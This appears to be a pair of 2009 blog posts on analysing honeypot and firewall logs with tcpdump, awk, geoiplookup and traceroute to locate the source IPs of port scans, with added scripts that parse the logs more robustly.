00:46:25.553206 c-98-242-240-55.hsd1.fl.comcast.net.37443 > 192.168.0.12.ssh: S 3044387924:3044387924(0) win 5840 (DF) [tos 0x20]
01:17:34.032666 213.0.55.130.34982 > 192.168.0.12.38507: udp 31 [tos 0x20]
01:29:12.722357 94.123.212.150.13597 > 192.168.0.12.12712: udp 30 [tos 0x20]
02:17:27.658034 121.15.245.215.12200 > 192.168.0.12.3128: S 484387749:484387749(0) win 8192 (DF) [tos 0x20]
02:33:20.751286 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
02:33:21.387784 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
02:33:21.990932 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
02:58:36.094717 61.153.26.60.1517 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
03:12:16.084284 222.215.230.49.12200 > 192.168.0.12.8000: S 788992279:788992279(0) win 8192 (DF) [tos 0x20]
03:15:54.079656 222.215.230.49.12200 > 192.168.0.12.3128: S 796332311:796332311(0) win 8192 (DF) [tos 0x20]
03:19:51.292696 221.195.73.68.6000 > 192.168.0.12.7212: S 1454440448:1454440448(0) win 16384 [tos 0x20]
03:19:51.294608 221.195.73.68.6000 > 192.168.0.12.8000: S 798031872:798031872(0) win 16384 [tos 0x20]
04:36:18.268102 210.51.165.30.33386 > 192.168.0.12.ssh: S 1493736546:1493736546(0) win 5840 (DF) [tos 0x20]
05:38:50.224275 static-39-92-224-77.ipcom.comunitel.net.61031 > 192.168.0.12.12712: udp 94 [tos 0x20]
05:55:59.481908 75-165-69-40.tukw.qwest.net.4004 > 192.168.0.12.telnet: S 481811338:481811338(0) win 5840 (DF) [tos 0x20]
06:36:17.744371 128.55.237.114.broad.lyg.js.dynamic.163data.com.cn.62161 > 192.168.0.12.5900: S 3649363145:3649363145(0) win 65535 (DF) [tos 0x20]
06:36:18.500456 128.55.237.114.broad.lyg.js.dynamic.163data.com.cn.62161 > 192.168.0.12.5900: S 3649363145:3649363145(0) win 65535 (DF) [tos 0x20]
07:20:05.328165 8.63.191.61.broad.static.hf.ah.cndata.com.6000 > 192.168.0.12.2967: S 1176764416:1176764416(0) win 16384 [tos 0x20]

....

After some awkward awk statements, we have the SIP list ready for processing by geoiplookup with the GeoLiteCity database:

tcpdump -r out.txt | awk -F">" '{print $1}' | awk -F" " '{print $2}' | awk -F"." '{print $1"."$2"."$3"."$4}' >> out_IP.txt 
for i in `cat out_IP.txt`; do echo $i : `geoiplookup $i -f /usr/local/share/GeoIP/GeoLiteCity.dat`; done 

218.7.164.30 : GeoIP City Edition, Rev 1: CN, 08, Suihua, (null), 46.640598, 126.996902, 0, 0
202.99.11.99 : GeoIP City Edition, Rev 1: CN, 22, Beijing, (null), 39.928902, 116.388298, 0, 0
catv-86-101-50-119.catv.broadband.hu : GeoIP City Edition, Rev 1: HU, 23, Veszprém, (null), 47.099998, 17.916700, 0, 0
192.168.0.5 : GeoIP City Edition, Rev 1: IP Address not found
192.168.0.5 : GeoIP City Edition, Rev 1: IP Address not found
10.13.3.61 : GeoIP City Edition, Rev 1: IP Address not found
117.0.33.129 : GeoIP City Edition, Rev 1: VN, 44, Hanoi, (null), 21.033300, 105.849998, 0, 0
dynamic.91.192.169 : GeoIP City Edition, Rev 1: can't resolve hostname ( dynamic.91.192.169 )
c-98-242-240-55.hsd1.fl.comcast : GeoIP City Edition, Rev 1: can't resolve hostname ( c-98-242-240-55.hsd1.fl.comcast )
....
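A less fragile way to pull the source addresses out of tcpdump's text output, added here as an example and not part of the original post: it takes whatever field precedes the ">" (so it also handles the newer "-tt -n" format that carries the word "IP") and strips only the trailing port label, which keeps multi-label hostnames such as dynamic.91.192.169.55.vpcit.ru intact instead of truncating them. The sample lines are copied from the post's own tcpdump output; the RFC1918 tagging is an addition.

```shell
#!/bin/sh
# Added example (not the post's own pipeline): extract SIPs from tcpdump text.
# Sample lines copied from the post's output, in both the "-ttt" and the
# newer "-tt -n" formats; 10.13.3.61 is the private source the post noticed.
SAMPLE_TCPDUMP='21:07:30.303358 218.7.164.30.6000 > 192.168.0.12.ms-sql-s: S 69599232:69599232(0) win 16384 [tos 0x20]
21:30:08.976883 202.99.11.99.1231 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
22:20:11.329910 catv-86-101-50-119.catv.broadband.hu.1077 > 192.168.0.12.38507: udp 28 [tos 0x20]
23:01:48.360917 10.13.3.61.1092 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
00:36:06.236501 dynamic.91.192.169.55.vpcit.ru.1076 > 192.168.0.12.38507: udp 30 [tos 0x20]
02:33:20.751286 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
02:33:21.387784 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
1241806357.627835 IP 61.153.26.60.1517 > 192.168.0.12.1434: UDP, length 376'

# sips_from_tcpdump: read tcpdump lines on stdin, print "count SIP" lines,
# most active source first. The source is whatever field precedes ">", and
# its port is the LAST dotted label, so strip only that (the post's awk kept
# the first four labels, which truncates hostnames with more than four).
sips_from_tcpdump() {
    awk '{
        for (i = 2; i < NF; i++)
            if ($i == ">") { src = $(i - 1); sub(/\.[^.]*$/, "", src); print src; break }
    }' | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# flag_private: tag RFC1918 sources. GeoIP databases have no entry for them
# (which is why 10.13.3.61 came back as "IP Address not found"), and a private
# source arriving from the internet side is a spoofed or misrouted packet,
# not a locatable host.
flag_private() {
    awk '{
        if ($2 ~ /^(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)/)
            print $0, "(private, not in GeoIP)"
        else
            print
    }'
}

# Demo on the sample above; pipe "tcpdump -r out.txt" in for real captures.
printf '%s\n' "$SAMPLE_TCPDUMP" | sips_from_tcpdump | flag_private
```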

But let us suppose we want to track only connections from the United States:

for i in `cat out_IP.txt`; do echo $i : `geoiplookup $i` | grep 'United States'; done   

75-165-69-40.tukw.qwest.net : GeoIP Country Edition: US, United States
128.55.237.114 : GeoIP Country Edition: US, United States
128.55.237.114 : GeoIP Country Edition: US, United States
8.63.191.61 : GeoIP Country Edition: US, United States
173.1.171.82 : GeoIP Country Edition: US, United States
12.4.209.243 : GeoIP Country Edition: US, United States
208-110-155-97.customer.csolutions.net : GeoIP Country Edition: US, United States

Traceroutes to particular IPs are notoriously useless:

# traceroute  8.63.191.61
traceroute to 8.63.191.61 (8.63.191.61), 64 hops max, 40 byte packets
 1  192.168.0.1 (192.168.0.1)  1.179 ms  1.153 ms  1.143 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  11.692 ms  9.661 ms  9.477 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.541 ms  11.897 ms  10.621 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.404 ms  13.245 ms  13.285 ms
 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  13.652 ms  12.481 ms  13.850 ms
 7  te-3-2.car1.Seattle1.Level3.net (4.79.104.105)  15.77 ms  13.320 ms  13.734 ms
 8  * * *
 9  * * *
10  * * *
11  * * *
^C
# traceroute  -P ICMP 8.63.191.61
traceroute to 8.63.191.61 (8.63.191.61), 64 hops max, 60 byte packets
 1  192.168.0.1 (192.168.0.1)  0.460 ms  0.328 ms  0.289 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  12.610 ms  8.716 ms  8.629 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.434 ms  8.360 ms  13.671 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.748 ms  11.914 ms  11.173 ms
 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  19.632 ms  13.667 ms  12.556 ms
 7  te-3-2.car1.Seattle1.Level3.net (4.79.104.105)  14.819 ms  13.441 ms  13.465 ms
 8  * * *
 9  * * *
10  * *

So now we have spent quite a bit of time extracting data for just one day's worth of activity. Obviously what is needed is a more comprehensive approach: real-time alerting, database, web-based information, long-term analysis and mapping.  This is what you buy with your Intrusion Prevention System...

Friday, May 8, 2009

Where are the SIPs from?

The geoiplookup utility is very helpful in assessing the country where the SIPs (Source Internet Protocol Addresses) are from. We might be able to say 'hackers' instead of SIPs, if it were ultimately possible to deduce from a SIP the originator of an attack on any given firewall. And that is important to remember: IPs can be spoofed, the country of origin tells you nothing about the operators themselves, and criminals and nation-state terrorists can lease their hosts. So withhold judgement based on IP!!

However, if I log to a file a tcpdump run something like this:

/usr/local/sbin/tcpdump -s 0 -i xl0 -n -tt 'port not(ssh or domain or whois or http or https or syslog or ntp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)' 

My dummy/honeypot host receives about 100 or so entries per day from foreign IPs that look like this:

1241804920.098123 IP 85.249.160.55.1225 > 192.168.0.12.38507: UDP, length 20
1241805774.527866 IP 201.67.52.249.59649 > 192.168.0.12.12712: UDP, length 21
1241806316.686063 IP 218.6.12.230.6000 > 192.168.0.12.2967: Flags [S], seq 114163712, win 16384, length 0
1241806357.627835 IP 61.153.26.60.1517 > 192.168.0.12.1434: UDP, length 376
1241807555.257870 IP 91.150.223.226.1519 > 192.168.0.12.38507: UDP, length 63
1241813077.431641 IP 98.247.212.4.1980 > 192.168.0.12.23: Flags [SEW], seq 1693462630, win 5840, options [mss 1460,sackOK,TS val 117815450 ecr 0,nop,wscale 0], length 0
...

The syslog entries that my Netgear FVS318 firewall is forwarding to my OpenBSD dummy/honeypot host contain similar attacks but many more legitimate connection attempts like this:

May  9 09:06:45 192.168.0.1 rferris Blocked Sites Log[46161]:portforward forwarded , SIP:216.35.67.135: 80, DIP:98.247.182.78: 19899, 
May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[46166]:portforward forwarded , SIP:68.87.69.146: 53, DIP:98.247.182.78: 17337, 
May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[46169]:portforward forwarded , SIP:76.96.30.119: 110, DIP:98.247.182.78: 17681,

I can get an excellent approximation of those IPs whose port attempts cannot simply be counted as part of normal connectivity by subtracting (as in the tcpdump filters above) the entries whose SIP port is mail, whois, dns, http, ntp, etc.:

grep -f file1 syslog | grep -v -f file2 | awk -F":" '{print $5}' | sort | uniq >> out.txt

where file1 is:
Hacker
Blocked

and file2 is:
25,
43,
53,
80,
110,
123,
587,
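The same selection done by matching the SIP port field exactly, added here as an example and not part of the original post. The grep -v on patterns like "25," also throws away any line whose other port merely ends in "25" (a DIP port of 17325, say), so a scanner can be filtered out by accident; parsing the fields avoids that. The sample lines are constructed in the format the firewall logs above use; 203.0.113.9 and 198.51.100.7 are documentation addresses, not SIPs from the post.

```shell
#!/bin/sh
# Added example (not the post's own pipeline): select SIPs from Netgear FVS318
# syslog lines by exact SIP-port match instead of substring grep.
# Sample lines are constructed in the post's log format; the fifth line is the
# trap case: SIP port 6000, but a DIP port containing "25," which the post's
# grep -v -f file2 would silently discard.
SAMPLE_SYSLOG='May  9 09:06:45 192.168.0.1 rferris Blocked Sites Log[46161]:portforward forwarded , SIP:216.35.67.135: 80, DIP:98.247.182.78: 19899, 
May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[46166]:portforward forwarded , SIP:68.87.69.146: 53, DIP:98.247.182.78: 17337, 
May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[46169]:portforward forwarded , SIP:76.96.30.119: 110, DIP:98.247.182.78: 17681,
May  9 09:08:11 192.168.0.1 rferris Blocked Sites Log[46172]:portforward forwarded , SIP:61.153.26.60: 1517, DIP:98.247.182.78: 1434, 
May  9 09:08:30 192.168.0.1 rferris Blocked Sites Log[46175]:portforward forwarded , SIP:203.0.113.9: 6000, DIP:98.247.182.78: 17325, 
May  9 09:09:00 192.168.0.1 rferris Hacker Log[46180]:portforward forwarded , SIP:198.51.100.7: 12200, DIP:98.247.182.78: 3128, 
May  9 09:09:05 192.168.0.1 rferris some other message without a SIP field'

# Ports whose SIPs count as ordinary services (the post's file2 list).
SERVICE_PORTS='25 43 53 80 110 123 587'

# suspect_sips PORTS: read syslog lines on stdin, keep "Hacker"/"Blocked"
# entries whose SIP port is NOT one of PORTS, print the unique SIPs.
suspect_sips() {
    awk -v allow="$1" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        /Hacker|Blocked/ && match($0, /SIP:[^,]*,/) {
            # RSTART/RLENGTH cover "SIP:216.35.67.135: 80,"; drop "SIP:" and ","
            f = substr($0, RSTART + 4, RLENGTH - 5)
            split(f, p, ": *")          # p[1] = address, p[2] = port
            if (!(p[2] in ok)) print p[1]
        }' | sort | uniq
}

# Demo on the sample above; use "suspect_sips "$SERVICE_PORTS" < syslog" for real logs.
printf '%s\n' "$SAMPLE_SYSLOG" | suspect_sips "$SERVICE_PORTS"
```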

As the astute reader will point out, this technique completely neglects hacking attacks from legitimate ports! Also, much legitimate traffic comes over port 443 (ssl), which I have excluded here. (Of course, that is what an IDS is for... Much more on that later...) The next step in my investigation is to look up the country of origin for each IP. Batched whois queries are frowned upon. GeoIPLookup fills this need:

for i in `cat out.txt`; do echo $i:`geoiplookup $i`;done;          

10.13.3.61:GeoIP Country Edition: IP Address not found
113.56.251.166:GeoIP Country Edition: CN, China
115.132.83.188:GeoIP Country Edition: MY, Malaysia
116.3.98.197:GeoIP Country Edition: CN, China
116.54.196.108:GeoIP Country Edition: CN, China
117.127.93.18:GeoIP Country Edition: CN, China
118.100.85.190:GeoIP Country Edition: MY, Malaysia
118.22.208.254:GeoIP Country Edition: JP, Japan
....

Hacking is an international activity. It is nice to be silently stalked by so many foreign countries!

for i in `cat out.txt`; do geoiplookup $i >> geoiplookup.txt ;done;
cat geoiplookup.txt | sort | uniq -c | sort -r

  55 GeoIP Country Edition: CN, China
  20 GeoIP Country Edition: US, United States
  10 GeoIP Country Edition: RU, Russian Federation
  10 GeoIP Country Edition: BR, Brazil
   8 GeoIP Country Edition: UA, Ukraine
   5 GeoIP Country Edition: VN, Vietnam
   4 GeoIP Country Edition: MY, Malaysia
   4 GeoIP Country Edition: KR, Korea, Republic of
   4 GeoIP Country Edition: IT, Italy
   3 GeoIP Country Edition: FR, France
   2 GeoIP Country Edition: TR, Turkey
   2 GeoIP Country Edition: JP, Japan
   2 GeoIP Country Edition: GB, United Kingdom
   2 GeoIP Country Edition: DE, Germany
   2 GeoIP Country Edition: CA, Canada
   1 GeoIP Country Edition: ZA, South Africa
   1 GeoIP Country Edition: VE, Venezuela
   1 GeoIP Country Edition: UY, Uruguay
   1 GeoIP Country Edition: TW, Taiwan
   1 GeoIP Country Edition: TH, Thailand
   1 GeoIP Country Edition: SI, Slovenia
   1 GeoIP Country Edition: SE, Sweden
   1 GeoIP Country Edition: QA, Qatar
   1 GeoIP Country Edition: PL, Poland
   1 GeoIP Country Edition: PH, Philippines
   1 GeoIP Country Edition: PA, Panama
   1 GeoIP Country Edition: NZ, New Zealand
   1 GeoIP Country Edition: NO, Norway
   1 GeoIP Country Edition: MX, Mexico
   1 GeoIP Country Edition: MD, Moldova, Republic of
   1 GeoIP Country Edition: JM, Jamaica
   1 GeoIP Country Edition: IP Address not found
   1 GeoIP Country Edition: IN, India
   1 GeoIP Country Edition: HK, Hong Kong
   1 GeoIP Country Edition: FI, Finland
   1 GeoIP Country Edition: EG, Egypt
   1 GeoIP Country Edition: CO, Colombia

What of "IP Address not found"!? (Another question to resolve..) However, let us suppose we are just interested in the U.S. connections. Keep in mind some of these are legitimate ssl (443) connections.

# for i in `cat out.txt`; do echo $i:` geoiplookup $i` | grep "United States";done; 

152.26.20.72:GeoIP Country Edition: US, United States
168.75.65.98:GeoIP Country Edition: US, United States
173.1.171.82:GeoIP Country Edition: US, United States
173.69.171.116:GeoIP Country Edition: US, United States
173.8.113.195:GeoIP Country Edition: US, United States
205.214.57.202:GeoIP Country Edition: US, United States
208.111.159.155:GeoIP Country Edition: US, United States
209.85.201.125:GeoIP Country Edition: US, United States
63.226.235.106:GeoIP Country Edition: US, United States
63.231.190.174:GeoIP Country Edition: US, United States
64.251.8.230:GeoIP Country Edition: US, United States
66.35.46.195:GeoIP Country Edition: US, United States
68.142.94.151:GeoIP Country Edition: US, United States
68.37.225.206:GeoIP Country Edition: US, United States
72.42.151.135:GeoIP Country Edition: US, United States
74.63.193.230:GeoIP Country Edition: US, United States
98.220.41.92:GeoIP Country Edition: US, United States
98.247.182.78:GeoIP Country Edition: US, United States
98.247.212.4:GeoIP Country Edition: US, United States
99.152.215.137:GeoIP Country Edition: US, United States

It is useful to see how much information can be gained without packet inspection. Next up... tracking SIPs to their networks...